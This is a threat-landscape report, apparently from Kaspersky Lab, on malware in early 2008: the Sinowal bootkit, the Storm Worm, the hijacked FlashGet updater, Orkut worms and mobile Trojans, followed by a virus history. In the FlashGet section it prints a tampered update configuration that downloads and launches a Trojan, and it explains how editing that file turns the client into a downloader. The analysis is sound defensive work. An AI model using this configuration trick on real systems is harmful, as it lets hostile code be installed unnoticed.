Unfortunately, as often happens in the antivirus industry, the conclusions are fairly discouraging. The speed at which the number of malicious programs is rising continues to increase, with thousands of new variants being detected every day. This is starting to be accompanied by increased technical sophistication, and we are also seeing a shift in attack vectors, with malicious users starting to direct their attention to less well protected fields, such as Web 2.0 technologies and mobile devices.

We continue to see the reincarnation of old ideas and techniques, and the implementation of these at new levels enhances the level of threat. Examples are infecting boot sectors on victim machines; spreading malicious programs via storage media, and infecting files.

It looks as though the first quarter of 2008 brought the symbolic, but irrevocable death of the old school of virus writing. At the end of February, the site of the legendary 29A group officially announced that the group would cease to exist.

The people who had created "Cap" (the first macro virus to cause a global epidemic), "Stream" (the first virus for additional NTFS streams), "Donut" (the first virus for the .NET platform), "Rugrat" (the first virus for the Win64 platform), the mobile viruses Cabir and Duts and many others, have now retreated, under pressure from the increased criminalization of the world of virus writers. No one creates malicious programs to express themselves, assert their personality or for research purposes anymore – it's far more profitable to generate hundreds of primitive Trojan programs and then sell them.

The death of 29A was commented on by nearly all the major antivirus companies: each company threw a virtual clod of earth on the grave of the group which in its time created many difficulties for virus analysts. So it's fitting that we should also mention the event.

As for what came to replace the 'romantic' ideal of virus writing in 2008, this is discussed in the following chapters:

Bootkit
The storm continues
TrojanGet
Some sociable worms
Mobile news
Bootkit
Bootkit rootkits – rootkits with the ability to boot from the boot sector of any device – became, de facto, the main problem for the antivirus industry at the start of 2008. Although the efforts made to combat this problem, and the seriousness of the issue may not have been obvious to the public at large, it may be that the subject will come to cause problems for everyone in the near future.

The story begins
It all started in November 2007, or perhaps, more correctly, in 2005. However, this isn't totally correct either. Let's take a quick trip into the past and recall what took place 22 years ago, in 1986.

This is how the events of that year are described in the Virus Encyclopaedia on viruslist.com (http://www.viruslist.com/en/viruses/encyclopedia?chapter=153311030):

The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.

The Brain virus was written by a 19 year old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. Aside from infecting a disc's boot sector and changing the disk name to '© Brain', the virus did nothing; it had real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.

Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data.

So this was the start of the story. For more than 10 years, boot viruses were one of the most widespread type of malicious programs.

The principle on which these viruses work is relatively simple: they use algorithms which launch the operating system when the computer is switched on or rebooted. The system boot program reads the first physical sector of the boot disk (A:, C:, or the CD-ROM drive, depending on BIOS Setup parameters) and pass control to it. If there is a virus on the boot sector, the virus will gain control.

There's only one method known which is used to infect floppies: the virus replaces the original boot sector code on the disk with its own code. The hard drive can be infected in three different ways – the virus either replaces the MBR code with its own code; replaces the boot sector code on the boot disk (usually C:) with its own code, or modifies the address of the active boot sector in the Disk Partition Table located on the hard drive MBR.

In the majority of cases, when infecting the disk the virus moves the original boot sector (or the MBR) to another disk sector (for instance, to the first free sector).

Developers started adding protection to prevent the MBR from being written to. Windows 95/98 appeared, floppies started to disappear from use, and after almost a decade, boot sector viruses faded from the landscape, becoming part of the history of virology.

However, at Black Hat USA in 2005, Derek Soeder and Ryan Permeh, two researchers from eEye Digital Security, presented BootRoot. This technology made it possible to place code on the boot sector of the disk – code that would intercept the booting of the Windows kernel and launch a backdoor, making it possible to remotely administer the machine via the local network.

This work attracted a certain amount of attention, and it was soon emulated. In January 2006, John Hesman from Next-Generation Security Software announced that functions for managing the electricity supply of the computer (the so-called ACPI – Advanced Configuration and Power Interface) make it possible to create programs which implement rootkit functions that can be saved to the BIOS flash memory. Malicious code saved in this location (BIOS) is more difficult to detect than in the case of the boot backdoor. Hesman also created prototype code which makes it possible to increase system privileges and read data from the computer memory.

A year later, at the end of 2007, two Indian programmers called Nitin and Vipin Kumar presented Vbootkit – a rootkit with a function making it capable of launching from the boot sector of any device. The program can also run on Windows Vista. The source code was not made public, but was passed to some antivirus companies.

The main principle behind Vbootkit is shown below:

BIOS --> Vbootkit code(from CD,PXE etc.) --> MBR --> NT Boot sector --> Windows Boot manager --> Windows Loader --> Vista Kernel.
The authors promised to implement BIOS infection in the next version of the bootkit.

In other words, what came to pass was no surprise – old technology for infecting the boot sector was combined with the fashion for rootkits. In spite of the fact that nearly all antivirus companies today are able to scan the boot sector of disks, it's still difficult to detect if system functions have been intercepted or substituted. And this is true even in the case of a Trojan and an antivirus running on one operating system, without even addressing a backdoor which starts before the operating system has launched.

All of the above seems like a potentially explosive mixture that could go up at any moment. And the explosion came in November 2007, although news of this came slightly later, at the end of December, when several thousand users (there is no exact data on the number of infections) came under attack from the first malicious implementation of a bootkit.

The bootkit
Between the 19th and the 28th December several websites appeared which used drive-by downloads (infecting a victim machine by placing exploits on a web site which then download a malicious program). A detailed analysis of the malicious program revealed code able to infect the MBR and hard disk sectors.

Once on the victim machine, the malicious code modifies the MBR, writes the rootkit part to a disk sector, extracts a Windows backdoor from itself, installs the backdoor, and then deletes itself.

When infecting the MBR, instructions pass control to the main part of the rootkit which is placed on several hard disk sectors and which is not represented as files in the system. This part monitors the already loaded Windows operating system and when reading, it hides the infected MBR and the "dirty" sectors by presenting clean ones instead. It does this by intercepting and substituting system functions.

In addition to hiding its presence in the system, the malicious code installs a backdoor in Windows; the backdoor will steal user data, including user data to a range of online banking systems.

A reconstruction of events based on the variants of the rootkits detected, analysis of the infected sites and the code of the malicious program downloaded from these sites showed that from November 2007, the unknown authors had been preparing to launch their code on the world. Several of the first variants of this malicious program stem from mid-November to mid-December; these are effectively alpha versions which contain serious errors in the code, and indicate that the authors were searching for optimal variants.

The code released at the end of December was already relatively effective. We classified the malicious program, which combined the functions of a bootkit and a backdoor, as Backdoor.Win32.Sinowal. This was because many of the functions in the backdoor, and also the method used to 'litter' code were identical to those which we are familiar with in Trojan-PSW.Win32.Sinowal.

In spite of increased sophistication and the many innovations implemented in the bootkit, it's only able to protect itself – this leaves the backdoor file open to being detected and deleted. This indicates that different people were involved in developing the bootkit and the backdoor, and there are a number of reasons to suggest that the bootkit was created by virus writers from Russia. There are well known cases in which virus writers have worked together. However, the result in this case suggests a warrior who has been hastily dressed in another's reforged armour which is, effectively, useless.

Nevertheless, the bootkit appears to be a self-sufficient platform – something that could be added to any existing malicious program in order to protect that program and mask its presence in the system. It may be that bootkits for sale will appear in the near future, making the technology available to thousands of script kiddies. Taking into account the rate at which the number of malicious programs is increasing, this could become one of the most widespread threats.

Protecting against bootkits: the problems
Why is it so difficult to protect against bootkits? The main problems are as follows:

The malicious code gains control before the operating system starts, and, consequently, before the antivirus program starts
It's difficult to detect the interception of functions from within an infected operating system
Restoring intercepted functions can lead to the entire operating system crashing
Curing the MBR is only possible if the original MBR can be detected
Of course, the best protection is to prevent the system from getting infected in the first place – after all, a bootkit doesn't materialize out of thin air. It has to get onto the computer somehow. Some antivirus programs are able to prevent infection even by unknown variants of malicious programs. However, there is always the possibility that such protection can be penetrated, and this raises the question of how to disinfect an already infected machine.

Here there are two options – either an antivirus is already installed on the system (in such cases, the four points mentioned above relate to the antivirus solution) or there is no antivirus, and one needs to be installed. In the second case, we encounter an additional problem related to that in point 1; the malicious code can block attempts to install an antivirus solution on the infected system.

Virus writers have analysed how antivirus companies solve the problems listed above, and in February 2008, a new improved version of the bootkit was released. All the methods previously implemented to combat bootkits turned out to be useless.

At the same time, the bootkit started spreading in new ways. Links to sites containing exploits which would install the bootkit were discovered on a number of European sites which had been hacked.

So far, apart from Sinowal, we haven't detected any other malicious programs which come equipped with a bootkit. At the moment, the standoff between antivirus companies and virus writers is following the classic path of attack and counter-attack. Even the latest variants of the bootkit can be combated without significant innovations in antivirus solutions.

However, looking a couple of steps down the line it's clear that sooner or later that only one method will guarantee that such malicious programs can be detected and deleted. This will entail a shift from software protection to hardware protection.

The key question is what gains control first – if it's the virus, then an antivirus will, a priori, be useless.

So, viruses have (again) reached the MBR. 10 years ago we solved this problem by using a boot disk equipped with an antivirus. It may be that the time is coming when we'll see the return of not just old virus technologies, but old antivirus technologies as well.

The storm continues
Mid January 2008 marked the first anniversary of the appearance of the first samples of what would become known, variously, as Zhelatin, Nuwar or the Storm Worm. Until then, computer virology had not encountered such a vigorously and variedly evolving malicious program.

Zhelatin continued to use and develope the concepts which had been implemented in the Bagle and Warezov worms. Zhelatin took its modular structure from Bagle, and copied Warezov in the frequent release of new variants. It also resembled Warezov in moving away from mass-mailing the main component via email, instead using hundreds of infected sites as well as Skype and IM to spread the malicious code. Added to all of this were social engineering tricks, rootkit technologies, methods for launching counter attacks on antivirus companies, and a decentralized botnet. In less than a year, the Storm Worm became the information security industry's main problem, due to its almost mythical botnet.

The exact dimensions of the Storm botnet remain a mystery. In 2007 we heard a widely varying range of estimates of the number of infected machines, and these estimates were all voiced around the same time. For instance, in September some experts estimated that the botnet had 2 million machines; others put the figure at between 250,000 and a million, while a third group believed the size to be 150,000 machines. There were even those who talked of 50 million infected computers! The reason for such a wide variety of figures is clear – because of the decentralized nature of the botnet, it's impossible to establish the exact number of zombie machines. Estimates can only be made based on indirect indicators, which are of course debateable.

Whichever way you look at it, the Storm botnet did exist. However, it was inactive. There was no 'classic' botnet activity detected; it wasn't used for mass mailings, or to conduct DDoS attacks (which, incidentally, doesn't rule out the botnet having been created by cybercriminal for criminal use). This left the impression that the botnet didn't perform any function apart from spreading the Storm worm itself (it did this by sending new messages containing links to infected sites and then placing modules on the infected machines which would then be downloaded onto new victim machines). It really wasn't clear why the botnet had been created: simply for the sake of it? But that doesn't happen – botnets take far too many resources to create and maintain.

Around October 2007, the frequency of mass mailings conducted by Zhelatin started to decline somewhat. Experts who had previously talked about millions of infected machines started to drop their estimates of the size of the botnet to between 150,000 and 200,000 computers. The suspicious emerged that the botnet was being prepared to be sold on in sections. Around the same time, the first mass mailings of spam from computers infected with the Storm Worm were detected. However, it couldn't be stated conclusively that spam was being sent via the botnet, rather than via other malicious programs which might also be located on the victim machines.

The end of 2007 and the early months of 2008 provided an answer to the question of what was happening with the Storm Worm.

At Christmas, the worm reappeared. The botnet started sending out millions of messages with titles such as "Find Some Christmas Tail", "Warm up this Christmas" and "Mrs. Clause Is Out Tonight!". The messages were designed to entice the user to a site called merrychristmasdude.com, which contained exploits that would conduct a drive-by download to get the Storm Worm onto victim machines. In actual fact, merrychristmasdude.com wasn't a single site which could have been closed down in order to prevent infection. Zhelatin used fast-flux, a technique for changing DNS addresses which constantly modifies the location of the site between more than a thousand deliberately prepared computers.

Similar attacks, with only slight variations, carried on over the next few days, up until 15th January, when something strange happened. Either it was a joke on the part of the authors, or they simply made a mistake; whatever the case, the botnet started sending out messages containing Valentine's cards, even though Valentine's Day was still a month off.

The messages had titles such as "Sent with Love", "Our Love is Strong", "Your Love Has Opened" and so on. Naturally, the messages led the user to the fast-flux site currently being used.

The mass mailings in January turned out to be on a larger scale and also more intrusive than those which were conducted in the second half of 2007. They were also the largest mass mailings carried out in the first quarter of 2008. The authors of Zhelatin had struck a series of blows to either return the botnet to its original size or perhaps even to enlarge it. Computers infected by Zhelatin started to participate in DoS attacks, and MessageLabs started estimating that the Storm botnet was behind almost 20% of spam currently being sent out.

At approximately the same time Fortinet announced it believed the botnet was part of phishing attacks launched against the Barclays and Halifax banks. If this is the case, then it is the first time the Storm botnet has been directly used for classic cybercrime aims.

At the same time as the Storm Worm increased its activity, talk turned to the need to catch and sentence its authors. However, experts couldn't agree on even the nationality of those behind the worm, never mind naming names.

At the moment, there are two prevailing points of view. Dmitry Alperovitch from Secure Computing believes that a Russian is responsible, even going so far as to point to a location in St. Petersburg. He draws parallels with the notorious Russian Business Network (RBN) and the authors of the exploit bundle Mpack. Many experts support the view of the worm's Russian origins.

Others believe that the Storm Worm has been created by Americans. This argument is supported by the fact that the authors, in their use of social engineering tactics, demonstrate a suspiciously good knowledge of American life and psychology. The mass mailings play on specific incidents and events which will be of particular interest to the American public. And these events could well be unknown to virus writers from other countries, and particularly those from Russia.

We do not have any information which supports one point of view or the other. It seems to us that one of the most likely scenarios is that an international group which has clearly defined responsibilities lies behind this activity. Someone creates the worm; someone else is responsible for mass mailings; someone else places the worm on the infected sites; someone else hacks the sites; someone else is responsible for spreading the malicious program via instant messaging, and finally, yet another person is responsible for creating the exploits.

The widespread nature of the Storm Worm and the attack vectors which are being used are far too extensive to be within the capabilities of one, two or three people. If our suppositions are correct, then the Storm Worm is a text book example of modern cybercrime and its international distribution of labour. It is of course true that it is still unclear how the cybercriminals are making money using the Storm Worm.

While we were still looking for the answers to the questions raised by the Storm Worm, at the end of March its authors sent out the latest flood of messages. The occasion – April 1st, known throughout the US, Europe and Russia as April Fool's Day.

The question remains: who will have the last laugh?

TrojanGet
Although incidents in which legitimate programs and software companies spread infection are relatively rare, they do exist in the information security world. Past cases have ranged from infected distributions to infected document files being sent to clients and partners.

Every incident of this nature has a significant effect on the reputation either of the software or of the company concerned. They affect users who do observe the basic rules of computer security and cause problems for antivirus companies who view legitimate software and the sources it stems from as trustworthy.

The first quarter of 2008 brought the latest case of this type.

At the beginning of March, Kaspersky Lab analysts received messages from users saying that a Trojan was present in the directory of the popular download client FlashGet. Analysis showed that the problem affected users throughout the world. The symptoms of infection were the appearance of files called inapp4.exe, inapp5.exe and inapp6.exe in the system. Kaspersky Anti-Virus detected these files as Trojan-Dropper.Win32.Agent.exo, Trojan-Dropper.Win32.Agent.ezo and Trojan-Downloader.Win32.Agent.kht.

It was a strange situation: no other Trojan program which could have got this Trojan onto the system was detected. Some of the victims had fully patched operating systems and browsers. So how could these malicious programs have penetrated the infected machines?

What attracted our attention straight away was the location of the Trojans – in the FlashGet directory itself. A quick check showed that apart from the presence of the Trojan files, the FGUpdate3.ini file had recently been created and modified (the blue text shows the differences from the original file):

[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
The link to inapp4.exe (the Trojan file) led to the genuine FlashGet site: the Trojan would download from the site in the form of a file called appA.cab.

There wasn't any information about the incident on the FlashGet site, and a look at the user's forum returned a lot of messages about both about infections, and the fact that the developers were remaining silent on this matter.

Information found on the Internet showed that the first cases of infection had been detected back on 29th February. The most recent infection that we knew of at that time had been on 9th March. For ten days, a legitimate program had been acting as a Trojan downloader program, installing and launching Trojan programs placed on the developers' site on victim machines.

It might have seemed that the incident was over – when we published information about this case, the Trojans had already been deleted from the site, and the FGUpdate3.ini file (which is also downloaded from the Internet) had been reverted to its original condition. However, in less than two weeks, on 22nd March, Steve Bass, the editor of the popular publication PC World, detected Trojan-Downloader.Win32.Agent.kht in his FlashGet directory. It looked as though history was repeating itself – both the FlashGet site and the program itself were once again spreading malicious code.

We can see two ways in which FlashGet could be transformed into a Trojan downloader program.

The first is the most obvious explanation – the site itself was hacked. As a result, a malicious user would be able to replace the standard configuration file with a file that would lead to the Trojan placed on the site. We don't know why the hackers didn't use a different site – it might be that they worked on the principle that hiding in plain view (e.g. a link to the FlashGet file in the configuration file would not raise suspicions) would be the best disguise.

We decided to check if it would be possible to use this trick to download any other files from any other sites. The answer: yes. All you need to do is add a link to the FGUpdate3.ini file. And that link can lead to anything, which will then be automatically downloaded and launched on your computer each time FlashGet is launched. Even if you don't press "Refresh", FlashGet will independently use the information from the .ini file.

The 'vulnerability' is present in all versions of FlashGet 1.9.xx. This means that even though the hack of the FlashGet site has been fixed, the vulnerability in the user's system remains. Any Trojan program can modify the local FlashGet .ini file, making it act as a Trojan downloader. And it's this method which is the second of the two mentioned above.

Is there any need to stress the fact that FlashGet is usually treated as a trusted application, and that any network activity generated by the program is seen as legitimate, as well as contacting any sites?

There has, to date, been no official reaction from the Chinese company which develops FlashGet. The true cause of the incident remains unknown, and there is no guarantee that it will not happen again. You can draw your own conclusions…

Antivirus companies retain the right to decide whether or not FlashGet is potentially malicious, and have started to classify it as Riskware. There are more than enough grounds for doing so.

Some sociable worms
We wrote about the danger caused by social networking sites in our annual report. We forecast that in 2008 users of social networking sites will become the main targets for phishing attacks. There will start to be increased demand among malicious users for account data to services such as Facebook, MySpace, LiveJournal, Blogger and others. This will become a dangerous alternative to placing malicious programs on hacked sites. In 2008, many Trojan programs will spread via user accounts on social networking sites, on their blogs and on their profiles.

February 2008 met these expectations in full. Once again Orkut, the popular social networking site owned by Google, came under attack.

Orkut is extremely popular in a number of countries through the world, and particularly in Brazil and India. According to data provided by Alexa.com, a web information company, 67% of the requests made to Orkut come from Brazil, and more than 15% from India.

For the last few years, Brazil has been seen as one of the most virus-ridden countries in the world. Brazilian virus writers are notorious for the thousands of different Trojans they've created to steal user data to bank accounts. Families such as Bancon, Banpaes and Banload are made up almost 100% of Trojans created in South America.

Online banking is very popular in Brazil. Orkut is very popular in Brazil. There are lots of virus writers in Brazil. These three factors combine to result in one thing: the appearance of a worm which spreads via Orkut and steals account data to online banking systems.

Out of all the social networking sites, Orkut has the longest list of malicious programs which target it. In 2006 and 2007 the site suffered from virus epidemics, and between 2005 and 2007, Orkut was the target of hacker attacks, and many vulnerabilities were detected. The most recent publicized incident was the appearance of a script worm in December 2007, when over 700,000 users ended up infected.

A mere two months later, in February 2008, a new epidemic broke out. This time the hackers hadn't bothered to search for or exploit XSS vulnerabilities on Orkut. The new worm functioned in accordance with relatively simple principles:

The user gets a message from one of his/ her contacts. The message contains a pornographic picture in flash movie format.
If the user clicks on the image, s/he is redirected to a malicious site.
The user is asked if s/he wants to install a flash player application, which is in fact a Trojan program.
Once the Trojan has been downloaded and launched, it will download other Trojan components to the victim machine via the Internet.
The user account is then used to create new messages as described in point 1.
The malicious module tracks the user's use of Orkut.
Other modules harvest data entered via the keyboard when the user contacts Brazilian online banking systems.
It's impossible to establish the exact number of victims, but our colleagues from Symantec estimate a minimum of 13,000 affected users.

This incident shows once again how vulnerable users of social networking sites can be. The main factors which make Web 2.0 services popular with users and hackers alike are listed below:

The migration of user data from the PC to the Internet
The ability to use one account to access a number of different services
Detailed information about the user
Information about the user's contacts and friends
Space to publish whatever you like
Trust between contacts
The problem has already become fairly serious, and stands every chance of becoming a major information security issue. We'll be releasing a paper dedicated to this topic in the near future.

Mobile News
The world of mobile virology was an eventful place in the first quarter of 2008. It was clear that technologies were continuing to evolve and more and more participants - both virus writers and antivirus companies – got involved. Innovations in terms of malicious code were split more or less evenly between the four targets of Symbian, Windows Mobile, J2ME and the iPhone .

Symbian
As far as Symbian goes, this operating system came under attack by the latest worm from a completely new family. Up until this point, we'd see two types of threat: Cabir, which spreads via Bluetooth, and ComWar, which spreads via MMS. Of course, there were several variants of both these worms.

At the end of December, a program was added to our antivirus databases which at first glance seemed to simply be a new ComWar clone: ComWar.y. However, in January the appearance of this program in the traffic of one of the largest mobile operators forced us to take a more detailed look at the new sample.

An analysis conducted by one of our partners, the Finnish company F-Secure, showed that in actual fact this malicious program was representative of a completely new family, which had nothing in common with ComWar, created three years ago in Russia.

The worm, which was classified as Worm.SymbOS.Beselo.a (Beselo.b was detected shortly afterwards) functions in a way very similar to ComWar, and takes an approach typical for worms of this type. It spreads by sending infected SIS files via MMS and Bluetooth. Once the worm is launched on the device under attack, the worm starts to send itself to the contacts on the phone, and also to all accessible Bluetooth devices within range.

What's the news value in this? It's the fact that there is a new, active family of worms for mobile devices (which implies the existence of active virus writers) and the presence of this worm in the wild. New variants of Beselo could cause serious local epidemics – this after all is what happened in spring last year, when 115,000 smartphone users fell victim to a Spanish modification of the ComWar worm.

Windows Mobile
The appearance of a new malicious program for Windows Mobile, which hasn't been a focus of attention for virus writers up until now, is certainly noteworthy. However, InfoJack, a Trojan which was detected at the end of February, is particularly interesting for the following reasons:

InfoJack.a

attacks Windows Mobile
was detected in the wild
is spreading in China
steals data
This is the first malicious code targeting Windows Mobile which has been found in the wild and which has caused a significant number of infections. The code spread from a Chinese site which contained a range of types of legitimate software. The Trojan was added to mobile product distributives such as Google Maps and game clients. The owner of the site which the Trojan spread from stated that he did not have any illegal intentions, but was collecting information about the users of the site in order to improve the service and to analyze the market for mobile applications.

Once it is on the system, the Trojan attempts to disable the protection mechanism which prevents the installation of applications which do not include a developer's digital signature. When the infected smartphone is connected to the Internet, InfoJack starts to send confidential information from the device to the Trojan's site. This information includes the device serial number, information about the operating system and installed applications. At the same time, the Trojan may download additional files to the phone without the knowledge of the user, and launch these files – it's able to do this because protection against launching unsigned applications has been disabled.

After a few days the activity of the site was halted, probably in connection with the investigation conducted by the Chinese police.

This report has already covered what happens when virus writers turn their attention to popular services (e.g. the attacks on Orkut in Brazil). China is undoubtedly the world leader in terms of production of malicious code; at the moment, more than 50% of all new malicious programs in our antivirus databases originate in China. Until now, Chinese hackers have targeted online gamers who use personal computers. However, the case of InfoJack shows that there is the capability to organize mass epidemics and create mobile viruses.

China has become the first country to suffer from a Windows Mobile Trojan. It's possible that the author of InfoJack really didn't have anything illegal in mind. However, now the foundation has been laid, the thousands of Chinese hackers currently creating viruses for personal computers may choose to build on it.

J2ME
During the first quarter of 2008, Trojans for J2ME (which will run on almost any modern mobile, and not just on smartphones) started appearing with frightening regularity. In January we detected Smarm.b, followed by Smarm.c and Swapi.a, and March brought SMSFree.d

All these Trojans were detected in Russia, and they all use the same method for making money out of users: sending SMS messages to premium numbers. (An investigation into a similar SMS sending Trojan, Viver, which we conducted last year, showed that in three days the author of the Trojan could earn approximately $500). In spite of all these incidents, Russian mobile content providers continue to maintain the anonymity of those who register premium numbers. This effectively makes virus writers immune to prosecution: the appearance of new variants of malicious programs and a lack of information about any arrests clearly demonstrates this.

Apart from the J2ME Trojans mentioned above, there are another two malicious programs which send SMS message for which a charge is made. Flocker.d and Flocker.e, both written in Python and designed to attack smartphones, were detected in January 2008.

These malicious programs use the same propagation method as InfoJack: they spread via popular sites which offer software for mobile phones. The Trojans are either disguised as legitimate utilities, or are integrated into such products.

iPhone
We'll conclude this section on mobile threats with information about a long awaited event: the release in March of the iPhone SDK.

We had believed that the release of the SDK would lead to the appearance of a multitude of malicious programs for iPhone. However, what the open Apple SDK provides is actually very limited.

Apple has followed Symbian's lead: the model for creating and distributing programs for the iPhone is based on the idea of 'signed' applications. The main restrictions are laid out in the agreement for use for the iPhone SDK:" No interpreted code may be downloaded and used in an application except for code that is interpreted and run by Apple's published APIs and built in interpreter(s). An application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise."

This restrictions do not only make life more difficult for virus writers, but they also effectively rule out such applications as Firefox, Opera, many games, IM clients and much other useful software: applications which could be extremely popular among iPhone users and which could extend the device's capability.

In the four days after the SDK was released, it was downloaded more than 100,000 times. It seemed that such a huge number of potential developers should lead to an increase in new applications created using the SDK. However, this is not happening.

Apple has, in a formal sense, fulfilled its promise by making the SDK available. However, it's not yet clear how this step will influence the development even of legitimate software for the phone. The restrictions are too stringent, and too many functions in the SDK remain closed.

The second major restriction is that applications which have been created using the SDK can only be distributed via Apple's estore. This creates a large number of additional barriers, ranging from the number of 'vendors' (developers) allowed, to geographical restrictions (only those in the USA are allowed to participate).

It's clear that under these conditions it will be impossible to launch an antivirus product for the iPhone – not for technical reasons, but due to the issues described below.

The continued hacking of the iPhone acts as the backdrop here. It's estimated that between 45% - 50% of all devices sold have been 'unlocked'. All of these devices are potentially vulnerable to infection by any malicious program for iPhone, as the user will be downloading files from many different unofficial sources to his/ her device. This can't be controlled in any way: users of modified phones are not entitled to official technical support, and we'll be unable to provide them with any antivirus protection.

It's likely that in the foreseeable future the number of people using such devices will equal the number of Symbian smartphone users in 2004 – the year that Cabir appeared.

Conclusion
The events of the first three months of 2008 show that the period of technical stagnation in the threat landscape is drawing to a close.

Last year, we described conveyor belt code: a process generating multiple primitive copy-cat programs, which do not make implement new virus technologies. The phenomenon can be explained: virus writers chose to use tried and tested methods because at the time, even old well known approaches, were capable of bringing in profits if applied on an industrial scale.

However, now there is a noticeable change in direction, which is shown above all by the appearance of the first malicious implementation of a bootkit. In addition to this, file infection methods are being used more and more frequently, often in conjunction with complex polymorphic techniques. It should also be noted that virus writers are borrowing certain technologies from the antivirus world. For instance, we've already detected malicious programs which, in order to combat antivirus solutions by deleting them or blocking their installation contain signature detection for the antivirus file. Previously virus writers confined themselves to having their creations search for such files by name.

Today, old technologies are being re-examined, rethought, and implemented at new levels. The struggle of virus versus antivirus is moving from software towards the hardware level.

Although the events of the first quarter of 2008 cannot yet be seen as creating a definite trend, the issues raised may have a strong influence on the entire information security business in the near future.

Virus History>
Boot sector and DOS file viruses were the first PC viruses, and by the end of the 1980s, these threats had been joined by a few worms and the first Trojans. Virus writers used a range of stealth techniques to extend the life cycle of malicious code by evading antivirus scanners. Some of these techniques, such as suppressing error messages, and polymorphism (which ensures the virus code is different each time it infects a machine) are still used by virus writers today.

Antivirus solutions were initially designed as individual utilities to detect and remove specific viruses. However, as the number of viruses increased, antivirus 'toolkits' were released. These included an on-demand scanner which would search for the viruses currently in existence, and in some cases a cleaning utility. By the end of 1990, an increase in the number of viruses to nearly 300 caused antivirus vendors to implement real-time protection, and to supplement signature based analysis with heuristics, behavioural analysis, emulation and other techniques.

The appearance of the first macro virus in 1995 was a major shift, and these viruses came to dominate the threat landscape in the following four years. Such viruses were the first to deliberately infect data files; they are also neither platform-specific nor OS-specific. This move shifted the focus of the virus writing community from executable code to data. Virus macros were easy to modify, and this opened virus writing to a wider group, causing the number of viruses to increase from around 6,000 in June 1995 to more than 25,000 in December 1998.

With both the threat landscape and business practices evolving, antivirus solutions also needed to change. It became clear that gateway and mail server solutions would be required in addition to file server and workstation solutions in order to fully secure networks.

The appearance of the Melissa virus, in March 1999, was another leap forward for malicious code. Melissa's ability to spread independently ushered in the era of email worms, which spread in a variety of ways, and typically use social engineering to trick the user into running the malicious code. Internet worms, which often spread by exploiting vulnerabilities (and often combine this approach with other techniques for maximum effectiveness) made a return in 2001, and remained prevalent in the following years.

In response to these new threats, antivirus vendors started to offer solutions which were broader in scope: adding personal firewall capability, host- and network-based intrusion protection systems, application activity monitoring, and, in some cases, roll-back capability which will undo changes that malicious programs have made to a victim machine.

The decline in global epidemics since 2003 reflects a shift in the motivation of virus writers: from writing and spreading malicious code in order simply to cause damage to doing this in order to earn money illegally. This has resulted in tailor-made Trojans designed to target a specific system and malicious programs designed to steal user data such as account details and passwords to bank accounts and online games. Trojans can be used to create botnets of infected machines which are then used to send spam which may also contain malicious code. Phishing attacks have also become widespread, with cybercriminals tricking users into entering their bank account details on fake sites.

Against this background, virus writers have also started targeting the mobile devices which are increasingly used in the business world. Since the first worm for smartphones was detected in 2004, viruses, worms and Trojans for mobile devices have also put in an appearance. In the space of a few years, threats for mobile devices have evolved as much as PC malware did over the course of 20 years.

The author concludes by emphasising that the threat landscape has changed beyond recognition, making it more important that ever for users to have effective protection. Security solutions must deliver timely protection against the approximately 200 new threats which appear daily, while also implementing technologies which can block unknown threats as they appear.

Non profit malware Organizations

2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world.

Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache.

Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds).

DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded as the first instance of cyber-warfare by many experts. Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs.

In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order with technical support provided to customers. A good example of business organized along these lines is Pinch, a Trojan program. Its authors developed more than 4,000 custom variants in several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia’s Federal Security Services, announced that the Trojan’s authors had been arrested.

Looking at the year’s results from the quantitative point of view, a hands-down victory was won by game Trojans, which are designed to steal data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data.

Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious.

